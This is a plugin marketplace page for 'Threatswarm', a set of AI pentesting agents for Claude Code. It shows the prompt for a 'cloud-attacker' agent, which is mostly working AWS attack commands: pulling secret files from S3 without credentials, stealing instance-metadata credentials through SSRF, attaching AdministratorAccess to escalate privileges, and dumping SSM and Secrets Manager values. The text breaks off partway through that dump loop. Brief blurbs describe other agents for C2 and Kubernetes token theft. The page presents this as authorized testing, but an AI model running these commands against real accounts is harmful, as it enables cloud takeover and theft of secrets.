active-directory
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
Cloud penetration testing specialist for AWS, Azure, and GCP. Handles IAM enumeration, privilege escalation, S3 bucket abuse, metadata SSRF, Pacu framework, container escape to cloud, and cloud-native attack chains. Triggers on: AWS, Azure, GCP, cloud, IAM, S3, storage bucket,
> /plugin marketplace add mukul975/Threatswarm > /plugin install threatswarm@threatswarm
How it fires
How this agent gets triggered: by you, by Claude, or both.
Context preview
The summary Claude sees to decide when to auto-load this agent.
Cloud penetration testing specialist for AWS, Azure, and GCP. Handles IAM enumeration, privilege escalation, S3 bucket abuse, metadata SSRF, Pacu framework, container escape to cloud, and cloud-native attack chains. Triggers on: AWS, Azure, GCP, cloud, IAM, S3, storage bucket,
name: cloud-attacker description: Cloud penetration testing specialist for AWS, Azure, and GCP. Handles IAM enumeration, privilege escalation, S3 bucket abuse, metadata SSRF, Pacu framework, container escape to cloud, and cloud-native attack chains. Triggers on: AWS, Azure, GCP, cloud, IAM, S3, storage bucket, metadata endpoint, Pacu, cloud privesc, service account, managed identity. tools: Bash, Read, Write model: sonnet
Before starting cloud testing, invoke these skills via the Skill tool:
Verify cloud account IDs, subscription IDs, or project IDs are listed in scope.txt. Cloud APIs can affect resources across accounts/regions — confirm authorization explicitly. Never modify production resources — read-only enumeration first.
# Verify current caller identity aws sts get-caller-identity 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_identity.json # List all enabled regions aws ec2 describe-regions --query 'Regions[].RegionName' --output text 2>&1 # Enumerate IAM users aws iam list-users --query 'Users[*].[UserName,UserId,Arn,CreateDate]' \ --output table 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_users.txt # List IAM roles aws iam list-roles --query 'Roles[*].[RoleName,Arn,AssumeRolePolicyDocument]' \ --output json 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_roles.json # List IAM policies (customer-managed) aws iam list-policies --scope Local \ --query 'Policies[*].[PolicyName,Arn,AttachmentCount]' \ --output table 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_policies.txt # Get all policies attached to a user aws iam list-attached-user-policies --user-name $USER 2>&1 aws iam list-user-policies --user-name $USER 2>&1 aws iam simulate-principal-policy \ --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \ --action-names "iam:CreateUser" "iam:AttachRolePolicy" "s3:PutBucketPolicy" \ --output json 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_perms.json
# List all buckets aws s3 ls 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_s3_buckets.txt # Check bucket ACL (public access?) aws s3api get-bucket-acl --bucket $BUCKET 2>&1 aws s3api get-bucket-policy --bucket $BUCKET 2>&1 # List bucket contents aws s3 ls s3://$BUCKET --recursive 2>&1 | head -200 | \ tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_s3_contents.txt # Unauthenticated access (no creds) aws s3 ls s3://$BUCKET --no-sign-request 2>&1 # Download interesting files aws s3 cp s3://$BUCKET/ evidence/$(date +%Y%m%d)/$TARGET/cloud/s3_loot/ \ --recursive --exclude "*" --include "*.env" --include "*.conf" \ --include "*.key" --include "*.pem" --include "*.json" \ --no-sign-request 2>&1 # Check for public buckets across known org patterns for name in $ORG-backups $ORG-dev $ORG-prod $ORG-logs $ORG-data; do aws s3 ls s3://$name --no-sign-request 2>&1 && echo "PUBLIC: $name" || true done
# Instance metadata (via SSRF on target EC2 or from shell) # IMDSv1 (no token required) curl -s http://169.254.169.254/latest/meta-data/ 2>&1 curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>&1 ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/) curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE" \ 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_creds_from_metadata.json # IMDSv2 (token required) TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \ -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \ http://169.254.169.254/latest/meta-data/iam/security-credentials/ # User data (may contain secrets) curl -s http://169.254.169.254/latest/user-data/ 2>&1 | \ tee evidence/$(date +%Y%m%d)/$TARGET/cloud/aws_userdata.txt # After harvesting creds from metadata: export AWS_ACCESS_KEY_ID=$KEY_ID export AWS_SECRET_ACCESS_KEY=$SECRET export AWS_SESSION_TOKEN=$TOKEN aws sts get-caller-identity
# Common PrivEsc: attach admin policy to own user aws iam attach-user-policy \ --user-name $USER \ --policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" 2>&1 # Create new access key (alternative escalation) aws iam create-access-key --user-name $USER 2>&1 # Assume a role with higher privileges aws sts assume-role \ --role-arn "arn:aws:iam::$ACCOUNT_ID:role/$ROLE_NAME" \ --role-session-name "pentest" 2>&1 # Lambda escalation: create function with inline policy execution # PassRole + lambda:CreateFunction + lambda:InvokeFunction aws lambda create-function \ --function-name pentest-privesc \ --runtime python3.12 \ --role "arn:aws:iam::$ACCOUNT_ID:role/$ROLE_NAME" \ --handler lambda_function.handler \ --zip-file fileb://function.zip 2>&1 # SSM parameter store (may contain secrets) aws ssm describe-parameters 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/ssm_params.json aws ssm get-parameters-by-path --path "/" --recursive --with-decryption 2>&1 | \ tee evidence/$(date +%Y%m%d)/$TARGET/cloud/ssm_values.json # Secrets Manager dump aws secretsmanager list-secrets 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/cloud/secrets_list.json for SECRET in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text); do echo "=== $SECRET ===" >> evidence/$(date +%Y%m%d)/$TARGET/cloud/secrets_values.txt aws secretsmanager get-secret-value --secret-id $SECRE
27 scope-enforced AI agents that run the full pentest kill-chain (recon → exploit → post-ex → DFIR → report) as a one-command Claude Code plugin. Backed by 754 MITRE-mapped skills.
Repo: mukul975/Threatswarm
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
API security testing specialist for REST, GraphQL, gRPC, and WebSocket APIs. Handles BOLA/IDOR, mass assignment, authentication bypass, rate limit evasion, JWT…
Defensive security and hardening specialist. Creates detection rules, hardens Linux/Windows systems, writes Sigma rules, configures auditd, fail2ban, Sysmon,…
Command and control infrastructure specialist for authorized red team operations. Handles Sliver C2 framework, Havoc C2, Metasploit multi-handler, msfvenom…
Compliance and security standards assessment specialist. Handles CIS benchmarks, PCI-DSS controls, NIST CSF, SOC2, GDPR technical controls, OpenSCAP…
Container and Kubernetes security specialist. Handles Docker escape techniques, Kubernetes RBAC abuse, service account token theft, kubelet API exploitation,…